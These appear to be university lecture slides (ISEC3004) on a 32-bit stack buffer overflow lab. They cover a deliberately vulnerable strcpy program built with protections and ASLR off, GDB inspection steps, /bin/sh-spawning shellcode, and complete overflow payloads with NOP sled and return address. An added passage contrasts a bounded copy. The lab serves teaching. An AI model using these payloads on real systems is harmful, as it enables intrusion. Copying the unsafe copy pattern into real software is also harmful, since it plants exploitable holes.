32BO

The document outlines the prerequisites and steps for conducting a buffer overflow attack using a vulnerable C program. It details the setup of a Kali Linux environment, the identification of unsafe C functions, and the use of GDB for debugging and executing the attack. Additionally, it provides references for further reading on shellcode and buffer overflow techniques.
X86 - BO

Buffer Overflow Attack Anatomy

ISEC3004 2
Prerequisites for Buffer Overflow Attack
• CPU internals
• Assembly Language (accessible via GDB)
• Process Memory Layout
• Stack
• Shellcode

What C functions are vulnerable to buffer overflow?

→ printf, sprintf, strcat, strcpy, and gets

ISEC3004 3
System setup
• Download Kali-Linux from https://bit.ly/3wA9J66
• Double click kali-linux-2022.3-virtualbox-i386.vdi
• Username: kali
Password: kali
• sudo nano /etc/apt/sources.list
comment out the following line (using #)
deb http://http.kali.org/kali kali-rolling main contrib non-free
add the following line
deb http://mirror.fsmg.org.nz/kali kali-rolling main contrib non-free
ISEC3004 4
A vulnerable C program
• sudo nano vul.c
• gcc -g -m32 -z execstack -fno-stack-protector -no-pie -o vul vul.c
• ./vul A

vul.c:
    #include <stdio.h>
    #include <string.h>

    /* copies its argument into a fixed 128-byte stack buffer with no length check */
    int copier(char *str) {
        char buffer[128];
        strcpy(buffer, str);
        return 0;
    }

    int main(int argc, char *argv[]) {
        copier(argv[1]);
        printf("Done!\n");
        return 0;
    }
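Added example, not code from the ISEC3004 slides: the slides' copier() placed beside a bounded version that rejects input too long for the 128-byte buffer, so the missing check is visible in code. The function names copier_unsafe, copier_safe and copy_repeated_a, and the inputs built inside the program, are my own constructions.

```c
/* Added example, not from the ISEC3004 slides: the slides' copier() beside a
 * bounded version.  Function names and the constructed inputs are assumptions. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE  128   /* same buffer size as the slides' vul.c */
#define MAX_INPUT 256   /* size of the constructed test input */

/* As in the slides: strcpy() copies until the source's NUL byte, whatever the
 * destination size.  Input of BUF_SIZE bytes or more runs past buffer[] into
 * the saved EBP and return address that the GDB slides inspect.  Only call
 * this with in-bounds input. */
int copier_unsafe(const char *str) {
    char buffer[BUF_SIZE];
    strcpy(buffer, str);                  /* no bounds check */
    return (int)strlen(buffer);
}

/* Bounded version: look for the terminator within BUF_SIZE bytes only,
 * reject input that would not fit together with its NUL, and copy exactly
 * that many bytes.  Returns the copied length, or -1 when input is rejected. */
int copier_safe(const char *str) {
    char buffer[BUF_SIZE];
    const char *nul = memchr(str, '\0', BUF_SIZE);   /* never scans past BUF_SIZE */
    if (nul == NULL)
        return -1;                        /* >= BUF_SIZE bytes: would overflow */
    size_t len = (size_t)(nul - str);
    memcpy(buffer, str, len);
    buffer[len] = '\0';
    return (int)len;
}

/* Feed n repeated 'A' bytes to copier_safe(), mirroring the slides'
 * python2 -c 'print "A"*n' inputs (constructed here in C). */
int copy_repeated_a(int n) {
    char input[MAX_INPUT];
    if (n < 0 || n >= MAX_INPUT)
        return -2;                        /* outside what this harness builds */
    memset(input, 'A', (size_t)n);
    input[n] = '\0';
    return copier_safe(input);
}

int main(void) {
    int lengths[] = { 50, 127, 128, 136 };   /* 136 is the slides' overflow length */
    for (size_t i = 0; i < sizeof lengths / sizeof lengths[0]; i++) {
        int r = copy_repeated_a(lengths[i]);
        if (r < 0)
            printf("%3d bytes: rejected by copier_safe (strcpy would have overflowed)\n",
                   lengths[i]);
        else
            printf("%3d bytes: copied %d bytes\n", lengths[i], r);
    }
    return 0;
}
```

The compile flags on this slide (-fno-stack-protector, -z execstack, -no-pie) and the later randomize_va_space=0 switch off the mitigations that would otherwise detect or blunt the overflow; the bounded copy removes the defect itself, independent of those flags.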

ISEC3004 5
Configure GDB
• sudo apt update

• sudo apt install build-essential gdb

• sudo sysctl -w kernel.randomize_va_space=0

• sudo sh -c "echo 0 > /proc/sys/kernel/randomize_va_space"

• echo "set disassembly-flavor intel" > ~/.gdbinit


ISEC3004 6
Let’s attack vul using GDB . . .

• gdb -q vul

• disassemble main [Check for unsafe C functions]

No unsafe function is found… but there is a custom function “copier”

• disassemble copier [Check for unsafe C functions]

Unsafe function “strcpy” is found

ISEC3004 7
Let’s attack vul using GDB . . .
It is good practice to set the GDB breakpoint just after the call to the unsafe function.

• break *copier+43

• run $(python2 -c 'print "A"*50')

ISEC3004 8
Let’s attack vul using GDB . . .
Inspect the registers and the stack.
• info registers
• x $ebp
• x/50x $esp

ISEC3004 9
Let’s attack vul using GDB . . .
How many A’s are needed to fill up to $ebp?

• Get the memory address where the Buffer has started.


For my case, it is: 0xbffff0f8

• print ((long) $ebp - (long) $esp)

ISEC3004 10
Let’s attack vul using GDB . . .
On the previous terminal.
• run $(python2 -c 'print "A"*136')
• info registers
• x $ebp
• x/50x $esp

ISEC3004 11
Let’s attack vul using GDB . . .
On the previous terminal.
• run $(python2 -c 'print "A"*136 + "1234"')
• info registers
• x $ebp
• x/50x $esp

ISEC3004 12
Let’s see the power of Shellcode
• sudo nano shell.c
• gcc shell.c -fno-stack-protector -z execstack -o shell
• ./shell

shell.c (shellcode taken from https://www.exploit-db.com/shellcodes/47008):
    #include <stdio.h>
    #include <string.h>

    unsigned char code[] = \
    "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2"
    "\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
    "\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

    int main() {
        printf("length of your shellcode is: %d\n", (int)strlen(code));
        /* cast the byte array to a function pointer and jump into it */
        int (*foo)() = (int(*)())code;
        foo();
        return 0;
    }

ISEC3004 13
Let’s attack vul using GDB . . .
On the previous terminal.
• run $(python2 -c 'print "A"*88+"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"+"A"*16+"1234"')
• x/50x $esp

ISEC3004 14
Let’s attack vul using GDB . . .
On the previous terminal.
• run $(python2 -c 'print "\x90"*88+"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"+"A"*16+"1234"')
• x/50x $esp

ISEC3004 15
Let’s attack vul using GDB . . .

ISEC3004 16
Let’s attack vul using GDB . . .
On the previous terminal.
• run $(python2 -c 'print "\x90"*88+"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"+"A"*16+"\x40\xf0\xff\xbf"')
• x/50x $esp

ISEC3004 17
Let’s attack vul using GDB . . .
On the previous terminal.
• continue

ISEC3004 18
References
• https://shell-storm.org/shellcode/
• https://www.exploit-db.com/shellcodes

• https://www.exploit-db.com/docs/english/28475-linux-stack-based-buffer-overflows.pdf
• https://web.ecs.syr.edu/~wedu/seed/Book/book_sample_buffer.pdf
• https://cseweb.ucsd.edu/~dstefan/cse127-fall20/notes/bufferoverflow.html
• https://www.usna.edu/ECE/ec312/Lessons/host/EC312_Lesson_9_Buffer_Overflow_Attack_Course_Notes.pdf
• https://cdn.ttgtmedia.com/searchSecurity/downloads/ExploitingSoftware-Ch07.pdf

ISEC3004 19
Thank You

ISEC3004 20